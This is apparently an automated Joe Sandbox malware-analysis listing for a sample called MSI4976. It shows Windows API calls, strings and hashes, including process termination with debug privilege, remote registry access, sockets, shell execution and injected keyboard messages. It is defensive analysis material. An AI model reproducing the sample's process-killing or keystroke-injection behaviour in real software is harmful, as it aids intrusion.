                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 1300414916-2785691316
                                        • Opcode ID: 7cf7b6957eebbb2f877ba55bd56b021bb2009381ca2b222dfb1c8feb1bc8a864
                                        • Instruction ID: e90395b478c29168b02f8ab8f31f1e28187b157f5682afe6cdbc8cdfd31cb9c1
                                        • Opcode Fuzzy Hash: 7cf7b6957eebbb2f877ba55bd56b021bb2009381ca2b222dfb1c8feb1bc8a864
                                        • Instruction Fuzzy Hash: 35913D71D10228AFDB22DF94DC81EDEBBB9BF04710F108119F519AB251EB745A45CFA1
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00381B09
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00381B17
                                        • __wsplitpath.LIBCMT ref: 00381B45
                                          • Part of subcall function 0034297D: __wsplitpath_helper.LIBCMT ref: 003429BD
                                        • _wcscat.LIBCMT ref: 00381B5A
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00381BD0
                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00381BE2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                        • String ID: hE=
                                        • API String ID: 1380811348-1826862299
                                        • Opcode ID: e82ddd75883f608c9e935a505e3873cca2eb33b5da2322748e5d9dd5d1f4f242
                                        • Instruction ID: bbf12ce9c613668bfcaffa7e2e7f92c4a4683a332db100fcebd04ebda268e1a7
                                        • Opcode Fuzzy Hash: e82ddd75883f608c9e935a505e3873cca2eb33b5da2322748e5d9dd5d1f4f242
                                        • Instruction Fuzzy Hash: 185190715043109FD322EF24D885EABB7ECEF89754F00491EF5869B251EB70EA05CB92
                                        APIs
                                          • Part of subcall function 00366F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00366F7D
                                          • Part of subcall function 00366F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00366F8D
                                          • Part of subcall function 00366F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00367022
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038168B
                                        • GetLastError.KERNEL32 ref: 0038169E
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003816CA
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00381746
                                        • GetLastError.KERNEL32(00000000), ref: 00381751
                                        • CloseHandle.KERNEL32(00000000), ref: 00381786
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: f332aeec0eb93c3997719c6296dcc45c640a9dacdc8d1fc42b0a2477ffa1b6c2
                                        • Instruction ID: 4f965f37b13f02b5904f9174a8a68957c4425e4b9b7417e20181bb208635c40c
                                        • Opcode Fuzzy Hash: f332aeec0eb93c3997719c6296dcc45c640a9dacdc8d1fc42b0a2477ffa1b6c2
                                        • Instruction Fuzzy Hash: F141CF72700201AFDB06EF54C8E2FADB7A9AF59304F098049F9069F2D2EBB5D905CB51
                                        APIs
                                        • ShowWindow.USER32(003E1810,00000000,?,?,003E1810,003E1810,?,0039E2D6), ref: 0038E21B
                                        • EnableWindow.USER32(?,00000000), ref: 0038E23F
                                        • ShowWindow.USER32(003E1810,00000000,?,?,003E1810,003E1810,?,0039E2D6), ref: 0038E29F
                                        • ShowWindow.USER32(?,00000004,?,?,003E1810,003E1810,?,0039E2D6), ref: 0038E2B1
                                        • EnableWindow.USER32(?,00000001), ref: 0038E2D5
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0038E2F8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID: @U=u
                                        • API String ID: 642888154-2594219639
                                        • Opcode ID: 4d3516e719e28b4634661544aceddc897a5b594aeada60eca2203d8604f49c1d
                                        • Instruction ID: 96ac288d8d2e5aae6a8bea4c86295c7d2a66cfdc0ccac11a614602a649747e9f
                                        • Opcode Fuzzy Hash: 4d3516e719e28b4634661544aceddc897a5b594aeada60eca2203d8604f49c1d
                                        • Instruction Fuzzy Hash: 3B419E35200244EFDB27FF68C499B947BE9BF0A304F1945F9EA598F6A2C731A841CB51
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 003662D6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 286ecaf2ad7912d350699e45b0e3f78f58b37f8b93b439b881e0061dd6199c9c
                                        • Instruction ID: 6ef02dcf68f32903e133f45f1b90d7c8f0230f5755b2aca1fd1b8b6043266783
                                        • Opcode Fuzzy Hash: 286ecaf2ad7912d350699e45b0e3f78f58b37f8b93b439b881e0061dd6199c9c
                                        • Instruction Fuzzy Hash: 88110D32248742BAD7075B549CA3DAA77DCDF173A4B10442EF5016A6C6F7B0BE404265
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00367595
                                        • LoadStringW.USER32(00000000), ref: 0036759C
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003675B2
                                        • LoadStringW.USER32(00000000), ref: 003675B9
                                        • _wprintf.LIBCMT ref: 003675DF
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003675FD
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 003675DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: 8b8818723ca49d807503d4eac10781717768eb48078a9ec23e4f6b13ae6d546f
                                        • Instruction ID: acb7f04c617e38b511acecb6c11f0fb1acfdd1b56f60b03d2f6015c34b55663f
                                        • Opcode Fuzzy Hash: 8b8818723ca49d807503d4eac10781717768eb48078a9ec23e4f6b13ae6d546f
                                        • Instruction Fuzzy Hash: 720186F6900208BFE712A7E4DD89EE7376CD705304F404491B746E6451EA749E848B35
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00382AE7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3479070676-0
                                        • Opcode ID: 5fd9bb8c6ddf5f9a06ffb3185048b45d58604e6e227d62251d34753872d204b5
                                        • Instruction ID: 8a1e5bf904eae3ffc4e91a9dce7e41f5ecbecf1d09fdfc578969dcb4a18c87eb
                                        • Opcode Fuzzy Hash: 5fd9bb8c6ddf5f9a06ffb3185048b45d58604e6e227d62251d34753872d204b5
                                        • Instruction Fuzzy Hash: 80915875604301AFCB06EF54C891B6EBBE9FF88310F14885DF9969B2A1DB34E945CB42
                                        APIs
                                        • select.WS2_32 ref: 00379B38
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379B45
                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 00379B6F
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379B9F
                                        • htons.WS2_32(?), ref: 00379C51
                                        • inet_ntoa.WS2_32(?), ref: 00379C0C
                                          • Part of subcall function 0035E0F5: _strlen.LIBCMT ref: 0035E0FF
                                          • Part of subcall function 0035E0F5: _memmove.LIBCMT ref: 0035E121
                                        • _strlen.LIBCMT ref: 00379CA7
                                        • _memmove.LIBCMT ref: 00379D10
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 3637404534-0
                                        • Opcode ID: ca4a9ad32d6b862013fb8a94af7026e683cdde95e2b3a81a603c379e10813b08
                                        • Instruction ID: 4020c542a2586e3a9a76e5da1e6a689d95ccd1b08aa214969cb1f2ccf6574be9
                                        • Opcode Fuzzy Hash: ca4a9ad32d6b862013fb8a94af7026e683cdde95e2b3a81a603c379e10813b08
                                        • Instruction Fuzzy Hash: DB81BD31504210AFC726EF24DC85F6BB7E8EB89710F10861EF55A9B2A1DB34ED04CB92
                                        APIs
                                        • __mtinitlocknum.LIBCMT ref: 0034B744
                                          • Part of subcall function 00348A0C: __FF_MSGBANNER.LIBCMT ref: 00348A21
                                          • Part of subcall function 00348A0C: __NMSG_WRITE.LIBCMT ref: 00348A28
                                          • Part of subcall function 00348A0C: __malloc_crt.LIBCMT ref: 00348A48
                                        • __lock.LIBCMT ref: 0034B757
                                        • __lock.LIBCMT ref: 0034B7A3
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,003D6948,00000018,00356C2B,?,00000000,00000109), ref: 0034B7BF
                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0034B7DC
                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0034B7EC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1422805418-0
                                        • Opcode ID: 79143dec2848fdf75f8bd77d4fdf6712af45fc542032439c140154036b42d55e
                                        • Instruction ID: 13a54d89a90a2744acde3c9d77fd6fc04254f3d7cc4018e3306b2c1056b4bd7a
                                        • Opcode Fuzzy Hash: 79143dec2848fdf75f8bd77d4fdf6712af45fc542032439c140154036b42d55e
                                        • Instruction Fuzzy Hash: 894113719002558BEB169FA8D8843ACFBE8AF41325F158318E425AF6E2C7B4F841CB90
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0036A1CE
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0036A205
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0036A221
                                        • _memmove.LIBCMT ref: 0036A26F
                                        • _memmove.LIBCMT ref: 0036A28C
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0036A29B
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0036A2B0
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0036A2CF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 256516436-0
                                        • Opcode ID: fc1ea094a3bd15392dcf291f3c14a79e87c2bba6e445b68234718d5969abe404
                                        • Instruction ID: 0cafc98e0b40e1d71c51f6112b1ce15520686b5cc70f6e0ba7ae5e3c910cdd5e
                                        • Opcode Fuzzy Hash: fc1ea094a3bd15392dcf291f3c14a79e87c2bba6e445b68234718d5969abe404
                                        • Instruction Fuzzy Hash: 48319E31A00105ABCF02DFA4DC85AAEBBB8EF45310F1480A5E905AF256D774DA14CBA1
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 00323BCF: _wcscpy.LIBCMT ref: 00323BF2
                                        • _wcstok.LIBCMT ref: 00371D6E
                                        • _wcscpy.LIBCMT ref: 00371DFD
                                        • _memset.LIBCMT ref: 00371E30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                        • String ID: X$t:=p:=
                                        • API String ID: 774024439-2285903649
                                        • Opcode ID: cd697cc9ea10e78d32afc26649073bfe53adc96877d64fc2db94b85ee238b691
                                        • Instruction ID: 8f4dee9fbde810ae4a683029a0e9f414371ff0061aff1dfc0a25d474238001ab
                                        • Opcode Fuzzy Hash: cd697cc9ea10e78d32afc26649073bfe53adc96877d64fc2db94b85ee238b691
                                        • Instruction Fuzzy Hash: C2C173355087109FC726EF28D891A9EB7E4BF85310F01892DF8999B2A1DB74ED45CB82
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0078fa16067e0e94db2d12278e09735869948a9d8b29e78ab2ec182618823c2
                                        • Instruction ID: 4564aad78ad2a7815bd8cccd7142cbb258e7ce7600bdae83512e55485042fc97
                                        • Opcode Fuzzy Hash: c0078fa16067e0e94db2d12278e09735869948a9d8b29e78ab2ec182618823c2
                                        • Instruction Fuzzy Hash: 5E716D71904109EFDF06CF99CC88ABEBB78FF86314F248159FA15AA251C7349A51CFA4
                                        APIs
                                        • _memset.LIBCMT ref: 0038214B
                                        • _memset.LIBCMT ref: 00382214
                                        • ShellExecuteExW.SHELL32(?), ref: 00382259
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 00323BCF: _wcscpy.LIBCMT ref: 00323BF2
                                        • CloseHandle.KERNEL32(00000000), ref: 00382320
                                        • FreeLibrary.KERNEL32(00000000), ref: 0038232F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                        • String ID: @
                                        • API String ID: 4082843840-2766056989
                                        • Opcode ID: c68599e17f40168fb3a2221d4a242ade5a8d83588661f1a6e9fb9d27e64a094c
                                        • Instruction ID: 8fbfedac1f67a389f6605725bc805945c89cc40bc34bac0afd318708867f4a59
                                        • Opcode Fuzzy Hash: c68599e17f40168fb3a2221d4a242ade5a8d83588661f1a6e9fb9d27e64a094c
                                        • Instruction Fuzzy Hash: 5D71AA75A00629DFCB06EFA4D8959AEB7F5FF48310F108499E856AB351DB30AE40CB90
                                        APIs
                                        • GetParent.USER32(?), ref: 0036481D
                                        • GetKeyboardState.USER32(?), ref: 00364832
                                        • SetKeyboardState.USER32(?), ref: 00364893
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 003648C1
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 003648E0
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00364926
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00364949
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 86236d156456b76ebe6a9e268e8df2f78484554c5e54476e8bdb12171fc2bf6b
                                        • Instruction ID: 7671fede95c6fbd48f770f3a7e57570e756f0ff595e94eef91ad7b8e7bc62f3d
                                        • Opcode Fuzzy Hash: 86236d156456b76ebe6a9e268e8df2f78484554c5e54476e8bdb12171fc2bf6b
                                        • Instruction Fuzzy Hash: 5251CDA0E487D53DFB3B4634C845BBBBEE96B06304F09C589E1D54A8C6C7D9E888D760
                                        APIs
                                        • GetParent.USER32(00000000), ref: 00364638
                                        • GetKeyboardState.USER32(?), ref: 0036464D
                                        • SetKeyboardState.USER32(?), ref: 003646AE
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003646DA
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003646F7
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0036473B
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0036475C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
